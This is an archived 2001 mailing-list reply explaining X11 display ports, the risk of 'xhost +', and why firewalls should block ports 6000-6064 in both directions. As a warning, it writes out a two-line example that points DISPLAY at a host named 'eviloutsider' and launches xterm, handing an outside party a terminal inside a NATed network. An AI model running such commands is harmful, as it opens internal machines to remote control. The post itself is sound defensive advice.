Re: X Window over SSH
From: Rajeev Kumar (rajeev@rajeevnet.com)Date: 08/10/01
- Previous message: Crist J. Clark: "Re: X Window over SSH"
- In reply to: Greg Saoutine: "X Window over SSH"
- Next in thread: Matthew Collins: "Re: X Window over SSH"
- Next in thread: nrosenb2@csc.com: "Re: X Window over SSH"
- Reply: Matthew Collins: "Re: X Window over SSH"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <3B73EBEF.6010407@rajeevnet.com> Date: Fri, 10 Aug 2001 10:13:03 -0400 From: Rajeev Kumar <rajeev@rajeevnet.com> To: Greg Saoutine <gsaoutine@hotmail.com> Subject: Re: X Window over SSH
Greg,
As you know X11 works in sort of reverse way as far as user perception of client/server
matters. Once you are running X server on your machine it runs default on port 6000 but
this can be relocated and in case of more than one display attached to you machine you can
run X server listening to more than one port i.e 6000 for 1st display, 6001 for second
display and so on. User on remote end throwing display on your machine will the setup
environment variable like:
setenv DISPLAy yourhost:0.0 (for firt display at port 6000)
setenv DISPLAy yourhost:0.1 (for 2nd display, at port 6001)
Generally you know xhost command can be used on server side to control access to your X
server, but in general user run something like xhost + and leaving their X server open to all.
Now very important part on firewall side:
-----------------------------------------------
[1] You surely block incoming port 6000-6064 (assuming nobody will run X server above
6064), so that will protect your inside users. I guess everybody does this by default
these days.
!!!!!!!! IMPORTANT !!!!!!!!!!
[2] This one is important:
You should also block outgoing 6000-6064 ports on your firewall. if you don't do this (and I
know many company open all outgoing access) then anybody from inside your network can do
something like this.
inside% setenv DISPLAY eviloutsider:0.0
inside% xterm&
i.e that will give xterm to eviloutsider on your network machine. and user on evisoutsider
machine then can do anything your inside users can do. like fireup web browser and looking
to your intranet.
This is also very dangerous even if you are using NAT. Generally people think if you using
NAT(Hide NATin Checkpoint or Linux MASQ NAT) you are safe. Because nobody can connect to
you from outside. Now see above in in NATed networks users from inside can provide xterm
(or any X application) to outsider (since connection is from inside to outside). So in any
case block 6000-6064 always (incoming/outgoing )
With SSH you can port forward X11 traffic over SSH channel. So that is safe. Means only
ssh users can fireup X service and those are trusted :-)
I hope this helps.
Rajeev
Greg Saoutine wrote:
> My colleague came across the following within one of Sun's Newsgroups:
>
> [snip]
> Xsun currently provides no way to disable listening for TCP connections.
> If you need to worry about keeping people from connecting to the port,
> you will need to use some sort of firewall software to block them.
> [snip]
>
> Does it mean that the only way to *effectively* pipe X via SSH port 22
> is to set up a FW in front of the Sun box blocking port 6000? Any other
> ideas/solutions?
>
> Thank you,
> Greg Saoutine
>
>
>
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
>
>
>
>
- Previous message: Crist J. Clark: "Re: X Window over SSH"
- In reply to: Greg Saoutine: "X Window over SSH"
- Next in thread: Matthew Collins: "Re: X Window over SSH"
- Next in thread: nrosenb2@csc.com: "Re: X Window over SSH"
- Reply: Matthew Collins: "Re: X Window over SSH"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
